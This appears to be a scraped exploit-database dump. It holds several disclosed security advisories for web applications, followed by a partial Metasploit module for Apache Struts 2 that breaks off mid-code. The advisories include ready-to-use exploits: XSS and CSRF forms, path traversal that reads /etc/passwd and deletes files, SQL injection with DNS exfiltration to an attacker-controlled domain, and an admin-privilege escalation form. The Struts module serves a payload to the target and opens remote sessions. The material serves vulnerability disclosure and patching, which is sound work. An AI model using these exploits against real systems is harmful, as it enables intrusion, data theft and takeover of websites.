A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display the word \"immuniweb\": \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.6 The vulnerability exists due to insufficient filtration of the \"ct\" HTTP POST parameter passed to the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display the word \"immuniweb\": \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n \n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 \n \n3.1 The vulnerability exists due to insufficient filtration of the \"s\" HTTP GET parameter in the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\" script. A remote attacker can view the contents of arbitrary files on the target system using directory traversal sequences. 
\n \nThe exploitation example below displays the contents of the \"/etc/passwd\" file: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd \n \n3.2 The vulnerability exists due to insufficient filtration of the \"s\" HTTP GET parameter in the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences. \n \nThe exploitation example below deletes the file \"/tmp/immuniweb\": \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb \n \nSuccessful exploitation of this vulnerability requires that the file \"/tmp/immuniweb\" exists on the system. \n \n \n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908 \n \n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to the vulnerable scripts and gain knowledge of the full installation path of the application. 
\n \nThe following URL can be used to gain knowledge of full installation path of the application: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to VideoWhisper Live Streaming Integration version 4.29.5 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress. \n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. 
Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125454/videowhisper-xssshelltraversal.txt"}, {"lastseen": "2016-12-05T22:15:33", "bulletinFamily": "exploit", "description": "", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://packetstormsecurity.com/files/125571/OpenDocMan-1.2.7-SQL-Injection-Access-Control.html", "id": "PACKETSTORM:125571", "type": "packetstorm", "title": "OpenDocMan 1.2.7 SQL Injection / Access Control", "sourceData": "`Advisory ID: HTB23202 \nProduct: OpenDocMan \nVendor: Free Document Management Software \nVulnerable Version(s): 1.2.7 and probably prior \nTested Version: 1.2.7 \nAdvisory Publication: February 12, 2014 [without technical details] \nVendor Notification: February 12, 2014 \nVendor Patch: February 24, 2014 \nPublic Disclosure: March 5, 2014 \nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284] \nCVE References: CVE-2014-1945, CVE-2014-1946 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. \n \n \n1) SQL Injection in OpenDocMan: CVE-2014-1945 \n \nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. 
A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe exploitation example below displays version of the MySQL server: \n \nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 \n \n \n2) Improper Access Control in OpenDocMan: CVE-2014-1946 \n \nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. \n \nThe exploitation example below assigns administrative privileges for the current account: \n \n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"updateuser\" value=\"1\"> \n<input type=\"hidden\" name=\"admin\" value=\"1\"> \n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\"> \n<input type=\"submit\" name=\"login\" value=\"Run\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to OpenDocMan v1.2.7.2 \n \nMore Information: \nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/ \nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan. \n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. 
\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125571/opendocman127-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:55", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-09T00:00:00", "published": "2014-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/126074/Orbit-Open-Ad-Server-1.1.0-SQL-Injection.html", "id": "PACKETSTORM:126074", "type": "packetstorm", "title": "Orbit Open Ad Server 1.1.0 SQL Injection", "sourceData": "`Advisory ID: HTB23208 \nProduct: Orbit Open Ad Server \nVendor: OrbitScripts, LLC \nVulnerable Version(s): 1.1.0 and probably prior \nTested Version: 1.1.0 \nAdvisory Publication: March 19, 2014 [without technical details] \nVendor Notification: March 19, 2014 \nVendor Patch: March 21, 2014 \nPublic Disclosure: April 9, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-2540 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n 
\n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered a vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to the database of the vulnerable application and potentially gain control over the vulnerable website. \n \n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 \n \nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in an SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands. \n \nThe PoC code below is based on the DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name whose DNS server is controlled by the attacker): \n \n \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database: \n \n \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Orbit Open Ad Server 1.1.1 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server. \n[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology. 
\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126074/orbitopenadserver-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:19", "bulletinFamily": "exploit", "description": "", "modified": "2014-03-20T00:00:00", "published": "2014-03-20T00:00:00", "href": "https://packetstormsecurity.com/files/125797/CMSimple-3.54-Cross-Site-Scripting.html", "id": "PACKETSTORM:125797", "type": "packetstorm", "title": "CMSimple 3.54 Cross Site Scripting", "sourceData": "`Advisory ID: HTB23205 \nProduct: CMSimple \nVendor: Preben Bjorn Biermann Madsen \nVulnerable Version(s): 3.54 and probably prior \nTested Version: 3.54 \nAdvisory Publication: February 26, 2014 [without technical details] \nVendor Notification: February 26, 2014 \nVendor Patch: February 26, 2014 \nPublic Disclosure: March 19, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2219 \nRisk Level: 
Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in CMSimple, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in CMSimple: CVE-2014-2219 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"d\" HTTP GET parameter passed to \"/whizzywig/wb.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nFixed by vendor on February 26, 2014 directly in the source code without version modification/new release. Update to the version 3.54 released after February 26, 2014. \n \nMore Information: \nhttp://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23205 - https://www.htbridge.com/advisory/HTB23205 - Cross-Site Scripting (XSS) in CMSimple. \n[2] CMSimple - http://cmsimple.p2pnation.eu/ - CMSimple is a content management system primarily designed for easy creation and maintenance of small commercial sites, or sites for associations and individuals. 
\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125797/cmsimple354-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:23:18", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-02T00:00:00", "published": "2014-04-02T00:00:00", "href": "https://packetstormsecurity.com/files/125991/WordPress-XCloner-3.1.0-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:125991", "type": "packetstorm", "title": "WordPress XCloner 3.1.0 Cross Site Request Forgery", "sourceData": "`Advisory ID: HTB23206 \nProduct: XCloner Wordpress plugin \nVendor: XCloner \nVulnerable Version(s): 3.1.0 and probably prior \nTested Version: 3.1.0 \nAdvisory Publication: March 12, 2014 [without technical details] \nVendor Notification: March 12, 2014 \nVendor Patch: March 13, 2014 \nPublic Disclosure: April 2, 2014 \nVulnerability Type: Cross-Site Request Forgery [CWE-352] \nCVE Reference: CVE-2014-2340 
\nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered a vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of the vulnerable website. \n \n \nCross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340 \n \nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup. \n \nThe simple exploit code below will create a new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \n \n \n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"dbbackup\" value=\"1\"> \n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\"> \n<input type=\"hidden\" name=\"bname\" value=\"backup\"> \n<input type=\"hidden\" name=\"backupComments\" value=\"\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"generate\"> \n<input type=\"hidden\" name=\"boxchecked\" value=\"0\"> \n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\"> \n<input type=\"hidden\" name=\"\" value=\"\"> \n<input type=\"submit\" name=\"run\" value=\"run\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to XCloner 3.1.1 \n \nMore Information: 
\nhttp://www.xcloner.com/support/download/?did=9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - Cross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin. \n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as a standalone PHP/Mysql backup application. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125991/wpxcloner-xsrf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:31", "bulletinFamily": "exploit", "description": "", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://packetstormsecurity.com/files/125675/Open-Classifieds-2-2.1.2-Cross-Site-Scripting.html", "id": "PACKETSTORM:125675", "type": "packetstorm", "title": "Open Classifieds 2-2.1.2 Cross Site Scripting", "sourceData": "`Advisory ID: HTB23204 \nProduct: Open Classifieds \nVendor: Open Classifieds Team \nVulnerable Version(s): 2-2.1.2 and probably prior \nTested Version: 2-2.1.2 \nAdvisory Publication: February 19, 2014 [without technical details] \nVendor Notification: February 19, 2014 \nVendor Patch: February 20, 2014 \nPublic Disclosure: March 12, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2024 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Open Classifieds 2-2.1.3 \n \nMore Information: \nhttps://github.com/open-classifieds/openclassifieds2/issues/556 \nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23204 - https://www.htbridge.com/advisory/HTB23204 - Cross-Site Scripting (XSS) in Open Classifieds. \n[2] Open Classifieds - http://open-classifieds.com - Open Classifieds is web software you can use to create a beautiful classifieds or listings. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125675/openclassifieds2212-xss.txt"}, {"lastseen": "2016-12-05T22:13:37", "bulletinFamily": "exploit", "description": "", "modified": "2013-07-25T00:00:00", "published": "2013-07-25T00:00:00", "href": "https://packetstormsecurity.com/files/122541/Apache-Struts-2-DefaultActionMapper-Prefixes-OGNL-Code-Execution.html", "id": "PACKETSTORM:122541", "type": "packetstorm", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution', \n'Description' => %q{ \nThe Struts 2 DefaultActionMapper supports a method for short-circuit navigation \nstate changes by prefixing parameters with \"action:\" or \"redirect:\", followed by \na desired navigational target expression. This mechanism was intended to help with \nattaching navigational information to buttons within forms. \n \nIn Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \n\"redirectAction:\" is not properly sanitized. Since said information will be \nevaluated as OGNL expression against the value stack, this introduces the \npossibility to inject server side code. 
\n \nThis module has been tested successfully on Struts 2.3.15 over Tomcat 7, with \nWindows 2003 SP2 and Ubuntu 10.04 operating systems. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Takeshi Terada', # Vulnerability discovery \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit modules \n], \n'References' => \n[ \n[ 'CVE', '2013-2251' ], \n[ 'OSVDB', '95405' ], \n[ 'BID', '61189' ], \n[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ] \n], \n'Platform' => [ 'win', 'linux'], \n'Targets' => \n[ \n['Automatic', {}], \n['Windows', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 10 \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => 'Jul 2 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']), \nOptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]), \n# It isn't OptPath becuase it's a *remote* path \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ]) \n], self.class) \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nfalse unless file =~ /\\.exe/ \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \nend \nend \n \nsuper \nend \n \ndef 
start_http_service \n#do not use SSL \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \nservice_url = srv_host + ':' + datastore['SRVPORT'].to_s \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\") \nstart_service({ \n'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => '/' \n} \n}) \n \ndatastore['SSL'] = true if ssl_restore \n \nreturn service_url \nend \n \ndef check \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\") \nreturn Exploit::CheckCode::Unknown \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef auto_target \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? 
